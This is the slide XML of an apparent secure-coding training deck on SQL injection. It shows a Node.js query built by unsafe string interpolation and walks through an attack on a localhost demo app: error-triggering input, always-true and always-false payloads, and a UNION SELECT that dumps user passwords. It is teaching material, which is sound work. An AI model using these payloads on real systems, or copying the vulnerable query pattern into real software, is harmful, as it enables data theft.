              <a:t>5/20/2020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D827CA-570F-4D9B-A638-66F1E83C5C13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00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270CAF1B-FFC3-4DC2-81D7-A58DFDB6E891}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/20/2020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B0F7C0AF-9E55-4BBB-B792-CE38946D944B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7239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FC9B68-88C6-423A-992E-917165BD24A6}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/20/2020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D8426-2A2A-4E64-8B49-505FE8800737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8135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373C8A-E26C-4F9E-84C7-9F1A7DB7F8A5}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/20/2020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D951D5-EB51-4D84-A01E-F6AA76EA79A8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5279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7C8072D-5E8B-4407-88E6-D730C2B35D81}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/20/2020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8620C8-3578-415D-9D38-0AC61D18058C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3556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7E99BC-4A4B-4C54-8D46-E972EF2E24E9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/20/2020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B9298-4AEF-42B3-BD22-241924FAAB65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8143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0043DC-1774-4EA2-8C09-035D1662968B}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/20/2020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B7BA03-4736-4513-9685-E95FAA3FE7E3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0758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B804F4-886C-4A98-B722-141DF23DA482}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/20/2020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4D133-AB52-4DFA-AF5D-38B1ACD419B1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721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B6A467A4-DB60-43D3-8EA3-AEFB7F81D74D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/20/2020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D4313F00-98C0-46E5-A4D7-974BFEB2885C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2458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1/viewUser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information-schema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1/viewUser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wasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A1-Injectio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qlmap.sourceforge.net/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://code.google.com/p/bsqlhacke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tsecteam.com/en/projects/project1.htm" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sqlninja.sourceforge.net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ndex.php/Category:OWASP_SQLiX_Project" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://portswigger.net/burp/prox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10078.www1.hp.com/cda/hpms/display/main/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www-01.ibm.com/software/awdtools/appscan/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://h30406.www3.hp.com/campaigns/2008/wwcampaign/1-57C4K/index.php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rack.com/issues.html?issue=54&amp;id=8#articl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swigger.net/daily-swig/sql-injec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915816" y="2348880"/>
            <a:ext cx="3427095" cy="713591"/>
            <a:chOff x="3632708" y="2833997"/>
            <a:chExt cx="4569460" cy="951454"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="Group 6"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3632708" y="2833997"/>
              <a:ext cx="4569460" cy="920676"/>
              <a:chOff x="3513836" y="2898005"/>
              <a:chExt cx="4569460" cy="920676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418965" y="2898005"/>
                <a:ext cx="366433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3000" b="1" dirty="0" err="1">
                    <a:solidFill>
                      <a:srgbClr val="434A54"/>
                    </a:solidFill>
                    <a:latin typeface="Raleway" panose="020B0503030101060003" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>SecureCoding</a:t>
                </a:r>
                <a:endParaRPr lang="en-SG" sz="3000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="434A54"/>
                  </a:solidFill>
                  <a:latin typeface="Raleway" panose="020B0503030101060003" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="1026" name="Picture 2" descr="https://securecoding-mimosa.herokuapp.com/images/logo-150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13836" y="2913552"/>
                <a:ext cx="905129" cy="9051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4556125" y="3354564"/>
              <a:ext cx="34357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5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Raleway" panose="020B0503030101060003" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>SQL Injection</a:t>
              </a:r>
              <a:endParaRPr lang="en-SG" sz="1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360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SQL injection </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="1" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" alt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Assuming it works eventually, lets check if we could go further.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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" smtClean="0"/>
              <a:t>‘x’=‘x’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t> must be true and hence  likely (depends on the internal policy) to return a row to get</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="712788" lvl="2" indent="-44450"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------------------------------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="712788" lvl="2" indent="-44450"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Your login information has been mailed to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" smtClean="0"/>
              <a:t>random.person@example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="712788" lvl="2" indent="-44450"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------------------------------------------------------------</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" alt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971600" y="2780928"/>
            <a:ext cx="4500562" cy="9239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Arial" charset="0"/>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>fieldlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>field</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>anything' OR 'x'='x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>'; </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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noProof="0" dirty="0" smtClean="0"/>
              <a:t>Types </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" noProof="0" dirty="0"/>
              <a:t>of SQL Injections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="993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62" b="1" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1662" b="1" dirty="0" smtClean="0"/>
              <a:t>In-band </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1662" b="1" dirty="0"/>
              <a:t>SQL Injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1523" dirty="0"/>
              <a:t>Attacker gets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1523" dirty="0" smtClean="0"/>
              <a:t>direct output from the web server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1523" dirty="0" smtClean="0"/>
              <a:t>Response could be typically in the form of an error message or data from the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1523" dirty="0" smtClean="0"/>
              <a:t>Easier to exploit as data or error can be observed on screen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1523" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="309936" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="309936" lvl="1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sz="1662" b="1" dirty="0"/>
              <a:t>2. Blind SQL injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1523" dirty="0" smtClean="0"/>
              <a:t>Attacker asks the database server a “true” or “false” question</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1523" dirty="0" smtClean="0"/>
              <a:t>The response does not contain the data, but only some indicator a true or false response is returned</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1523" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1523" dirty="0"/>
              <a:t>Attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1523" dirty="0" smtClean="0"/>
              <a:t>has to guess and ask database series of “true” or “false” questions to derive the actual data from the database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1523" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="74475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43808" y="2492896"/>
            <a:ext cx="4001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000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="434A54"/>
                </a:solidFill>
                <a:latin typeface="Raleway" panose="020B0503030101060003" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In-Band SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="3000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="434A54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35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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434A54"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In-Band SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99330" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250826" y="1196752"/>
            <a:ext cx="8642349" cy="475297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The classic example...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1846" dirty="0" smtClean="0"/>
              <a:t>Data is returned to web page</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1846" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1846" dirty="0"/>
              <a:t>Usually very easy to exploit.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rechteck 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3494746" y="3673864"/>
            <a:ext cx="1006917" cy="206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246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668" y="3501008"/>
            <a:ext cx="5976664" cy="317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5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noProof="0" dirty="0" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b="1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29C01-F2FD-4307-BC33-AC7BADD0C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b="1" dirty="0" smtClean="0"/>
              <a:t>SQL In-Band Injection:</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>localhost:3001/viewUsers.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>SQL Query:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0"/>
              <a:t> = `SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" err="1"/>
              <a:t>userid,email,username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0"/>
              <a:t> FROM user WHERE </a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" err="1" smtClean="0"/>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0"/>
              <a:t>= '${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" err="1"/>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>}'`;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" err="1" smtClean="0"/>
              <a:t>conn.query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0"/>
              <a:t>, [], function(err, result){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>         ….</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>    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351694" y="6059367"/>
            <a:ext cx="301869" cy="271096"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E224AADB-8ECD-41A6-952A-C5C407130DF3}" type="slidenum">
              <a:rPr lang="de-AT" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="de-AT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7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316412"/>
            <a:ext cx="7849567" cy="952348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Now for the attack!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99330" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250826" y="1398228"/>
            <a:ext cx="8642349" cy="438736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62" b="1" dirty="0"/>
              <a:t>Step 1: Verify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2862" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2862" b="1" dirty="0" smtClean="0"/>
              <a:t> is vulnerable by supplying payload</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2862" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="356098">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" b="1" noProof="0" dirty="0"/>
              <a:t>Trigger an error condition </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" noProof="0" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="de-AT" noProof="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-AT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1kjhjh' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT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adnskfnak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="de-AT" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="de-AT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6098">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" b="1" noProof="0" dirty="0"/>
              <a:t>Insert a query that is always true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" noProof="0" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="de-AT" noProof="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" noProof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de-D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1=1;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="356098">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="de-AT" noProof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6098">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" b="1" dirty="0"/>
              <a:t>Insert a query that is always false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="de-AT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-D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de-D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1=2;-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE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3062" lvl="1" indent="-316531">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod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296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Now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0"/>
              <a:t>for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0"/>
              <a:t>attack!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="993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31" b="1" dirty="0"/>
              <a:t>Step 2: Execute arbitrary SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2031" b="1" dirty="0" smtClean="0"/>
              <a:t>queries</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2031" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="39567"/>
            <a:r>
              <a:rPr lang="en-US" sz="1846" dirty="0" smtClean="0"/>
              <a:t>Try: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1846" dirty="0"/>
              <a:t>Join </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1846" dirty="0" smtClean="0"/>
              <a:t>tables for SELECT queries with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1846" dirty="0"/>
              <a:t>UNION SELECT </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1846" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1846" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="356098">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="de-AT" noProof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567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681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Now for the attack!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99330" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250826" y="1184871"/>
            <a:ext cx="8642349" cy="4752974"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2031" b="1" dirty="0"/>
              <a:t>Step 2: Execute arbitrary SELECT queries</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2031" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1846" dirty="0"/>
              <a:t>Try: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1846" dirty="0" smtClean="0"/>
              <a:t>Join </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1846" dirty="0"/>
              <a:t>tables for SELECT queries with UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-SG" sz="1400" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1400" dirty="0" err="1"/>
              <a:t>userid,email,username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1400" dirty="0"/>
              <a:t> FROM user WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1400" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1400" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1400" dirty="0" smtClean="0"/>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>userid,email,password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t> from user;-- -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1400" dirty="0" smtClean="0"/>
              <a:t> `;</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="39567"/>
            <a:endParaRPr lang="de-AT" noProof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noProof="0" dirty="0"/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>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3140948" y="4234150"/>
            <a:ext cx="414675" cy="134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082204"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1187624" y="2996952"/>
          <a:ext cx="33250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779">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2417769748"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1388947">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2433947059"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1108362">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="332039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200" dirty="0" err="1" smtClean="0"/>
                        <a:t>userid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email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username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89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john@gmail.com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 smtClean="0"/>
                        <a:t>johntan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052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33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625515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956533"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5217018" y="2996952"/>
          <a:ext cx="339637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526">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2417769748"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1418726">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2433947059"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1132125">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="332039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200" dirty="0" err="1" smtClean="0"/>
                        <a:t>userid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email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Password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89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john@gmail.com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abc123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052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jack@gmail.com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xyz123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33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…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…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..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62551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062798"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3348285" y="4776356"/>
          <a:ext cx="373171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802">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2386832230"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1521445">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2492038012"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1499470">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
